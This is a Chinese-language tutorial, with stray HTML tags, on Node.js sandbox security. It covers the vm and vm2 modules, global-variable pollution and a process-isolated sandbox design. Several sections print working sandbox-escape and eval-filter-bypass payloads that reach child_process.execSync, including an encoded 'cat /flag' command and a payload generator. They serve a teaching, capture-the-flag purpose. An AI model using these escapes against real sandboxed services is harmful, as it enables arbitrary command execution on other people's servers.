Node.js沙箱与黑魔法安全指南<\/h1>

什么是沙箱<\/h2>
Node.js官方文档中的vm<\/code>模块可以用来创建沙箱环境执行代码，对代码的上下文环境做隔离。沙箱中的代码使用不同的V8上下文，意味着它拥有与主代码不同的全局对象。<\/p>
const<\/span> vm<\/span> =<\/span> require<\/span>('vm'<\/span>);
<\/span><\/span>vm<\/span>.runInNewContext<\/span>("console.log('Hello from sandbox')"<\/span>);
<\/span><\/span><\/code><\/pre>Node.js沙箱的安全性<\/h2>
vm模块的安全问题<\/h3>
尽管vm<\/code>隔离了代码上下文环境，但依然可以访问标准的JS API和全局的Node.js环境，因此vm<\/code>并不安全。官方文档明确警告：<\/p>

"The vm module is not a security mechanism. Do not use it to run untrusted code."<\/p>
<\/blockquote>
危险示例<\/strong>：<\/p>
const<\/span> vm<\/span> =<\/span> require<\/span>('vm'<\/span>);
<\/span><\/span>vm<\/span>.runInNewContext<\/span>("this.constructor.constructor('return process')().exit()"<\/span>);
<\/span><\/span>console<\/span>.log<\/span>("The app goes on..."<\/span>);  \/\/ 永远不会执行
<\/span><\/span><\/span><\/code><\/pre>安全改进方案<\/h3>
可以通过简化上下文来减少风险，只包含基本类型：<\/p>
let<\/span> ctx<\/span> =<\/span> Object.create<\/span>(null<\/span>);
<\/span><\/span>ctx<\/span>.a<\/span> =<\/span> 1<\/span>;
<\/span><\/span>vm<\/span>.runInNewContext<\/span>("this.constructor.constructor('return process')().exit()"<\/span>, ctx<\/span>);
<\/span><\/span><\/code><\/pre>vm2模块<\/h3>
为解决原生vm<\/code>的设计缺陷，社区开发了vm2<\/code>模块：<\/p>
const<\/span> {VM<\/span>} =<\/span> require<\/span>('vm2'<\/span>);
<\/span><\/span>new<\/span> VM<\/span>().run<\/span>('this.constructor.constructor("return process")().exit()'<\/span>); 
<\/span><\/span>\/\/ 抛出ReferenceError: process is not defined
<\/span><\/span><\/span><\/code><\/pre>但vm2<\/code>也有局限性：<\/p>

timeout<\/code>对异步代码不起作用<\/li>
可以通过重新定义Promise<\/code>绕过限制<\/li>
<\/ol>
绕过示例<\/strong>：<\/p>
const<\/span> { VM<\/span> } =<\/span> require<\/span>('vm2'<\/span>);
<\/span><\/span>const<\/span> vm<\/span> =<\/span> new<\/span> VM<\/span>({ 
<\/span><\/span>  timeout<\/span>:<\/span> 1000<\/span>, 
<\/span><\/span>  sandbox<\/span>:<\/span> { Promise:<\/span> function<\/span>(){}}
<\/span><\/span>});
<\/span><\/span>vm<\/span>.run<\/span>('Promise = (async function(){})().constructor;new Promise(()=>{});'<\/span>);
<\/span><\/span><\/code><\/pre>全局变量污染问题<\/h2>
污染示例<\/h3>
\/\/ a.js
<\/span><\/span><\/span><\/span>function<\/span> f<\/span>() { alert<\/span>("f() in a.js"<\/span>); }
<\/span><\/span>setTimeout<\/span>(function<\/span>() { f<\/span>(); }, 1000<\/span>);
<\/span><\/span>
<\/span><\/span>\/\/ b.js
<\/span><\/span><\/span><\/span>function<\/span> f<\/span>() { alert<\/span>("f() in b.js"<\/span>); }
<\/span><\/span>setTimeout<\/span>(function<\/span>() { f<\/span>(); }, 2000<\/span>);
<\/span><\/span><\/code><\/pre>后加载的b.js<\/code>会覆盖a.js<\/code>中的f()<\/code>函数定义。<\/p>
解决方案<\/h3>

命名空间模式<\/strong>：<\/li>
<\/ol>
var<\/span> sxc<\/span> =<\/span> {};
<\/span><\/span>sxc<\/span>.name<\/span> =<\/span> { big_name<\/span>:<\/span> "sunxiaochuan"<\/span>, small_name<\/span>:<\/span> "sungou"<\/span> };
<\/span><\/span>sxc<\/span>.work<\/span> =<\/span> { bilibili_work<\/span>:<\/span> "chouxiang"<\/span>, weibo_work<\/span>:<\/span> "qialanqian"<\/span> };
<\/span><\/span><\/code><\/pre>
匿名函数封装<\/strong>：<\/li>
<\/ol>
(function<\/span>(){
<\/span><\/span>  var<\/span> exp<\/span> =<\/span> {};
<\/span><\/span>  var<\/span> name<\/span> =<\/span> "aa"<\/span>;
<\/span><\/span>  exp<\/span>.method<\/span> =<\/span> function<\/span>(){ return<\/span> name<\/span>; };
<\/span><\/span>  window.ex<\/span> =<\/span> exp<\/span>;
<\/span><\/span>})();
<\/span><\/span><\/code><\/pre>JavaScript原型链污染<\/h2>
安全eval实现与绕过<\/h3>
安全eval实现<\/strong>：<\/p>
function<\/span> saferEval<\/span>(str<\/span>) {
<\/span><\/span>  if<\/span> (str<\/span>.replace<\/span>(\/(?:Math(?:\.\w+)?)|[()+\-*\/&|^%<>=,?:]|(?:\d+\.?\d*(?:e\d+)?)| \/g<\/span>, ''<\/span>)) {
<\/span><\/span>    return<\/span> null<\/span>;
<\/span><\/span>  }
<\/span><\/span>  return<\/span> eval(str<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>绕过方法<\/strong>：<\/p>
((Math)=>(Math=<\/span>Math.constructor<\/span>,Math.constructor<\/span>(Math.fromCharCode<\/span>(...))))(Math+<\/span>1<\/span>)()
<\/span><\/span><\/code><\/pre>完整攻击链<\/strong>：<\/p>
\/\/ 生成payload
<\/span><\/span><\/span><\/span>def<\/span> gen<\/span>(cmd<\/span>):<\/span>
<\/span><\/span>  s<\/span> =<\/span> f<\/span>"return process.mainModule.require('child_process').execSync('{cmd}').toString()"<\/span>
<\/span><\/span>  return<\/span> ','<\/span>.join<\/span>([str<\/span>(ord<\/span>(i<\/span>)) for<\/span> i<\/span> in<\/span> s<\/span>])
<\/span><\/span>
<\/span><\/span>\/\/ 实际攻击
<\/span><\/span><\/span><\/span>((Math)=>(Math=<\/span>Math.constructor<\/span>,Math.constructor<\/span>(Math.fromCharCode<\/span>(114<\/span>,101<\/span>,116<\/span>,117<\/span>,114<\/span>,110<\/span>,32<\/span>,112<\/span>,114<\/span>,111<\/span>,99<\/span>,101<\/span>,115<\/span>,115<\/span>,46<\/span>,109<\/span>,97<\/span>,105<\/span>,110<\/span>,77<\/span>,111<\/span>,100<\/span>,117<\/span>,108<\/span>,101<\/span>,46<\/span>,114<\/span>,101<\/span>,113<\/span>,117<\/span>,105<\/span>,114<\/span>,101<\/span>,40<\/span>,39<\/span>,99<\/span>,104<\/span>,105<\/span>,108<\/span>,100<\/span>,95<\/span>,112<\/span>,114<\/span>,111<\/span>,99<\/span>,101<\/span>,115<\/span>,115<\/span>,39<\/span>,41<\/span>,46<\/span>,101<\/span>,120<\/span>,101<\/span>,99<\/span>,83<\/span>,121<\/span>,110<\/span>,99<\/span>,40<\/span>,39<\/span>,99<\/span>,97<\/span>,116<\/span>,32<\/span>,47<\/span>,102<\/span>,108<\/span>,97<\/span>,103<\/span>,39<\/span>,41<\/span>,46<\/span>,116<\/span>,111<\/span>,83<\/span>,116<\/span>,114<\/span>,105<\/span>,110<\/span>,103<\/span>,40<\/span>,41<\/span>))))(Math+<\/span>1<\/span>)()
<\/span><\/span><\/code><\/pre>建立更安全的沙箱环境<\/h2>
进程池方案<\/h3>


架构设计<\/strong>：<\/p>

新建进程池管理沙箱进程<\/li>
任务到来时创建Script实例进入pending队列<\/li>
返回Script实例的defer对象<\/li>
调用处await执行结果<\/li>
<\/ul>
<\/li>

调度机制<\/strong>：<\/p>

sandbox master根据工程进程空闲情况调度执行<\/li>
master发送Script信息(含ScriptId)给空闲worker<\/li>
worker执行完成后回传"结果+Script信息"<\/li>
master通过ScriptId识别完成脚本<\/li>
<\/ul>
<\/li>

异常处理<\/strong>：<\/p>

异步操作超时直接kill工程进程<\/li>
master检测到进程终止后创建替补进程<\/li>
<\/ul>
<\/li>
<\/ol>
数据传输机制<\/h3>


常规数据<\/strong>：<\/p>

序列化后通过IPC传入隔离的Sandbox进程<\/li>
结果同样序列化通过IPC传输<\/li>
<\/ul>
<\/li>

方法传递<\/strong>：<\/p>

将宿主方法转换为描述对象<\/li>
包含允许调用的方法集合<\/li>
worker收到后建立代理方法<\/li>
代理方法通过IPC与master通讯<\/li>
<\/ul>
<\/li>
<\/ol>
实际漏洞案例<\/h2>
setTimeout漏洞<\/h3>
Node.js文档说明：<\/p>

当delay大于2147483647或小于1时，delay会被设置为1。非整数的delay会被截断为整数。<\/p>
<\/blockquote>
利用方式<\/strong>：<\/p>
?delay=2147483649
<\/code><\/pre>
safer-eval库漏洞<\/h3>
攻击payload<\/strong>：<\/p>
{
<\/span><\/span>  'e'<\/span>:<\/span> `(function () {
<\/span><\/span><\/span>    const process = clearImmediate.constructor("return process;")();
<\/span><\/span><\/span>    return process.mainModule.require("child_process").execSync("cat \/flag").toString()
<\/span><\/span><\/span>  })()`<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>总结<\/h2>

原生vm<\/code>模块不安全，不应直接用于执行不可信代码<\/li>
vm2<\/code>提供了更好的隔离但仍有绕过可能<\/li>
全局变量污染可通过命名空间或模块化解决<\/li>
原型链污染是JavaScript特有的安全问题<\/li>
最安全的沙箱方案是基于进程隔离的架构<\/li>
实际应用中需注意依赖库的安全性和版本<\/li>
<\/ol>